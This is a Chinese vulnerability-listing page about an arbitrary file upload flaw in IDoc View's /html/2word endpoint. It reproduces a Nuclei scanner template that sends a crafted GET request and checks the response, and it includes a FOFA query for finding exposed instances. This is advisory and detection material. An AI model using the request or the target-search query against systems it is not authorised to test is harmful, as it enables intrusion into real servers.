idocview-2word-fileupload: IDoc View /html/2word - Arbitrary File Upload

日期: 2025-08-01 | 影响软件: idocview-2word-fileupload | POC: 已公开

漏洞描述

PoC代码[已公开]

id: idocview-2word-fileupload

info:
  name: IDoc View /html/2word - Arbitrary File Upload
  author: DhiyaneshDK
  severity: high
  metadata:
    verified: true
    max-request: 1
    fofa-query: title=="在线文档预览 - I Doc View"
  tags: idoc,rce,instrusive,file-upload,vuln

variables:
  file: "{{to_lower(rand_text_alpha(5))}}"

http:
  - method: GET
    path:
      - "{{BaseURL}}/html/2word?url={{file}}"

    matchers-condition: and
    matchers:
      - type: word
        part: response
        words:
          - "{{md5(file)}}.docx"

      - type: status
        status:
          - 200
# digest: 490a004630440220724762540cb2c1bcd96d108d2ef238c904bccf7e82b48d80882d8eb54fafd5ee02202fdf8ded3558c7d41c3866e0f92ecad2a6a3656d0a0bdb04c784ed91f5e15df0:922c64590222798bb761d5b6d8e72950
来源: https://github.com/projectdiscovery/nuclei-templates/blob/main/http/vulnerabilities/idoc/idocview-2word-fileupload.yaml

相关漏洞推荐